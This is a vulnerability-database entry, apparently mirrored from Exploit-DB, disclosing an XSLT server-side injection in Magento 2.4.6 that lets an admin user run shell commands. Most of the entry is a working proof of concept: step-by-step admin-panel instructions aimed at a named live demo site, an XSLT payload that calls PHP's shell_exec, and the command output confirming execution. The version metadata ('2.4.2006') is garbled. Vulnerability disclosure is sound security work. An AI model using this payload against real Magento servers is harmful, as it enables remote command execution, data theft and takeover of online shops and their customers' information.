Magento ver. 2.4.6 - XSLT Server Side Injection

vendor:

Magento

by:

tmrswrr

6.1

CVSS

HIGH

XSLT Server Side Injection

CWE

Product Name: Magento

Affected Version From: 2.4.2006

Affected Version To: 2.4.2006

Patch Exists: NO

Related CWE: TBD

CPE: a:magento:magento:2.4.6

Metasploit:

Other Scripts:

Platforms Tested:

2023

Magento ver. 2.4.6 – XSLT Server Side Injection

An attacker can exploit a vulnerability in Magento version 2.4.6 by injecting malicious XSLT configuration, allowing the execution of arbitrary commands on the server. This can lead to unauthorized access, data theft, and further compromise of the Magento platform. This vulnerability has been assigned CVE-ID: TBD.

Mitigation:

To mitigate this vulnerability, it is recommended to update Magento to the latest patched version and avoid inputting untrusted data into XSLT configurations.

Source

Exploit-DB raw data:

# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6

## POC

1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>```

##RESULT
  
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)